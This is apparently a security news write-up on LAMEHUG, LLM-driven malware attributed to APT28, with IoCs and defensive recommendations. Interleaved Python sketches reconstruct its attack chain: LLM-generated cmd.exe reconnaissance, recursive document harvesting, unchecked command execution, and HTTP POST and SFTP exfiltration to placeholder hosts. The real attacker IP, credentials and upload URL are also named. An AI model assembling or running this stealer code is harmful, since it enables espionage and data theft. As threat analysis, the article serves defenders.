APT28 Hackers Unveil First LLM-Powered Malware, Enhancing Attack Techniques with AI

Ukraine’s Computer Emergency Response Team (CERT-UA) has publicly reported the emergence of LAMEHUG, the first known malware to embed large language model (LLM) capabilities directly into its attack chain.

This campaign targets Ukrainian government officials through phishing emails masquerading as communications from ministry representatives.

These emails deliver ZIP archives such as “Додаток.pdf.zip” containing PyInstaller-compiled Python executables, which run once the victim opens them.

CERT-UA attributes the operation, with moderate confidence, to APT28, also known as Fancy Bear, a threat actor linked to Russia’s GRU Unit 26165.

Discovery and Attribution

Analysis indicates APT28 utilized around 270 Hugging Face tokens for API authentication, framing this as a proof-of-concept (PoC) exploration of LLM weaponization in state-sponsored cyber espionage.

The malware’s simplistic code, lacking advanced obfuscation or evasion tactics, coupled with its deployment in Ukraine, a known testing ground for Russian cyber tools, suggests experimental rather than fully operational intent.

Multiple variants, including “Додаток.pif,” “save_document.py,” “AI_generator_uncensored_Canvas_PRO_v0.9.exe,” “AI_image_generator_v0.95.exe,” and “image.py,” exhibit evolving exfiltration methods, underscoring ongoing refinement.

At its core, LAMEHUG leverages the Qwen2.5-Coder-32B-Instruct LLM via Hugging Face’s API to generate real-time commands from base64-encoded prompts, enabling dynamic reconnaissance and data harvesting.
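For illustration, that request flow might look like the minimal Python sketch below; the endpoint, payload fields, token, and decoded prompt are assumptions based on the public Hugging Face Inference API rather than the recovered sample.

import base64
import requests

# Illustrative reconstruction, not LAMEHUG source: decode an embedded
# base64 prompt and send it to the Hugging Face serverless Inference API
# for Qwen2.5-Coder-32B-Instruct.
API_URL = "https://api-inference.huggingface.co/models/Qwen/Qwen2.5-Coder-32B-Instruct"
HEADERS = {"Authorization": "Bearer hf_xxx"}  # placeholder token, not one of the real ~270
encoded_prompt = "R2F0aGVyIFdpbmRvd3MgaG9zdCByZWNvbi4uLg=="  # placeholder, not the real prompt
prompt = base64.b64decode(encoded_prompt).decode("utf-8")
response = requests.post(API_URL, headers=HEADERS, json={"inputs": prompt}, timeout=30)
generated_commands = response.json()[0]["generated_text"]  # model reply: a cmd.exe command sequence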

For instance, the “Додаток.pif” variant uses prompts that create a directory at C:\ProgramData\info and compile system details into a text file for exfiltration: hardware specs via WMIC, process lists with tasklist, network configurations through ipconfig, and Active Directory enumerations using dsquery.
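A command sequence of that kind would look roughly like the reconstruction below, later consumed by the execution sketch further down; the output file name info.txt and the exact WMIC and dsquery arguments are assumptions, since the live prompt and reply are not reproduced verbatim here.

# Hypothetical reconstruction of the generated reconnaissance sequence.
RECON_SEQUENCE = r"""
mkdir C:\ProgramData\info
systeminfo >> C:\ProgramData\info\info.txt
wmic cpu get name >> C:\ProgramData\info\info.txt
wmic memorychip get capacity >> C:\ProgramData\info\info.txt
tasklist >> C:\ProgramData\info\info.txt
ipconfig /all >> C:\ProgramData\info\info.txt
dsquery computer -limit 0 >> C:\ProgramData\info\info.txt
dsquery user -limit 0 >> C:\ProgramData\info\info.txt
"""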

Another prompt directs recursive copying of Office documents, PDFs, and text files from user directories like Documents, Downloads, and Desktop.
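A minimal sketch of that harvesting step follows, assuming a staging directory of C:\ProgramData\info and a typical extension list; both are assumptions rather than recovered configuration.

import shutil
from pathlib import Path

STAGING = Path(r"C:\ProgramData\info")  # assumed staging directory
EXTENSIONS = {".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt"}
STAGING.mkdir(parents=True, exist_ok=True)
for folder in ("Documents", "Downloads", "Desktop"):
    for path in (Path.home() / folder).rglob("*"):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            try:
                shutil.copy2(path, STAGING / path.name)  # copy into the staging directory
            except OSError:
                continue  # skip locked or unreadable files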

Technical Innovations

Variants disguised as AI image generators use provocative prompts, such as generating images of “curvy naked woman sitting, long beautiful legs, front view, full body view, visible face,” to lure users while covertly interfacing with Flux AI APIs and executing background data collection.

The malware’s flow involves sending predefined prompts to the LLM, receiving tailored command sequences, and executing them immediately via cmd.exe, facilitating comprehensive intelligence gathering on systeminfo, CPU/memory metrics, disk details, MAC/IP addresses, user groups, and AD structures.
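The execution step can be pictured as the sketch below, which runs whatever the model returned (for example the RECON_SEQUENCE or generated_commands from the earlier sketches) line by line through cmd.exe; the function and variable names are illustrative.

import subprocess

def run_generated_commands(generated_text: str) -> None:
    # Execute each line of the LLM's reply via cmd.exe with no validation,
    # which is why behaviour can differ from one infection to the next.
    for line in generated_text.strip().splitlines():
        line = line.strip()
        if line:
            subprocess.run(["cmd.exe", "/c", line], capture_output=True, text=True)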

Exfiltration varies by variant: “image.py” employs SFTP to upload data to 144.126.202.227:22 using credentials “upstage/upstage,” while “Додаток.pif” uses HTTP POST to stayathomeclasses[.]com/slpw/up.php.
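The two channels can be sketched as follows, with placeholder endpoints and credentials standing in for the live infrastructure listed in the IoCs; the upload form field and remote path are assumptions.

import requests
import paramiko

ARCHIVE = r"C:\ProgramData\info\info.txt"  # assumed staging file

def exfil_http(url: str = "https://example.invalid/slpw/up.php") -> None:
    # "Додаток.pif"-style channel: HTTP POST of the collected data
    with open(ARCHIVE, "rb") as fh:
        requests.post(url, files={"file": fh}, timeout=30)  # "file" field name is an assumption

def exfil_sftp(host: str = "198.51.100.10", user: str = "user", password: str = "pass") -> None:
    # "image.py"-style channel: SFTP upload over port 22
    transport = paramiko.Transport((host, 22))
    transport.connect(username=user, password=password)
    sftp = paramiko.SFTPClient.from_transport(transport)
    sftp.put(ARCHIVE, "/upload/info.txt")  # hypothetical remote path
    transport.close()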

According to the Cato Networks Report, this LLM-driven approach poses severe challenges to traditional defenses, as signature-based detection falters against dynamically generated commands, network traffic mimics legitimate AI API calls, and behavioral analytics demand novel heuristics for LLM-powered anomalies.
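As a rough illustration of that last point, a defender could start from a heuristic such as the sketch below, which flags processes holding connections to the Hugging Face inference endpoint; the hostname and the premise that such traffic warrants review are assumptions, since in most environments it is legitimate, so hits are triage leads rather than verdicts.

import socket
import psutil

HOST = "api-inference.huggingface.co"  # assumed public serverless endpoint
hf_ips = {info[4][0] for info in socket.getaddrinfo(HOST, 443)}
# Enumerating all connections may require elevated privileges on some platforms.
for conn in psutil.net_connections(kind="inet"):
    if conn.raddr and conn.raddr.ip in hf_ips and conn.pid:
        try:
            proc = psutil.Process(conn.pid)
            print(f"{proc.name()} (pid {conn.pid}) -> {conn.raddr.ip}:{conn.raddr.port}")
        except psutil.NoSuchProcess:
            continue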

Security recommendations emphasize controls for shadow AI, enforcement of approved LLM access, real-time data loss prevention, and visibility via tools like Cato CASB.

Network protections include ML-based malware detection, DNS security, and application controls focused on AI platforms.

Extended detection and response (XDR) solutions enable AI/ML threat hunting, automated incident correlation, and one-click remediation, while zero-trust network access (ZTNA) microsegmentation curbs lateral movement.

LAMEHUG signals a paradigm shift toward AI-augmented cyber threats, and APT28’s PoC is likely a prelude to more refined iterations.

Organizations adopting Secure Access Service Edge (SASE) platforms are better equipped to counter these evolutions through integrated behavioral analysis and AI-aware defenses.

Indicators of Compromise (IoCs)

Filename: Додаток[.]pif
MD5: abe531e9f1e642c47260fac40dc41f59
SHA256: 766c356d6a4b00078a0293460c5967764fcd788da8c1cd1df708695f3a15b777

Filename: AI_generator_uncensored_Canvas_PRO_v0.9[.]exe
MD5: 3ca2eaf204611f3314d802c8b794ae2c
SHA256: d6af1c9f5ce407e53ec73c8e7187ed804fb4f80cf8dbd6722fc69e15e135db2e

Filename: AI_image_generator_v0.95[.]exe
MD5: f72c45b658911ad6f5202de55ba6ed5c
SHA256: bdb33bbb4ea11884b15f67e5c974136e6294aa87459cdc276ac2eea85b1deaa3

Filename: Image[.]py
MD5: 81cd20319c8f0b2ce499f9253ce0a6a8
SHA256: 384e8f3d300205546fb8c9b9224011b3b3cb71adc994180ff55e1e6416f65715
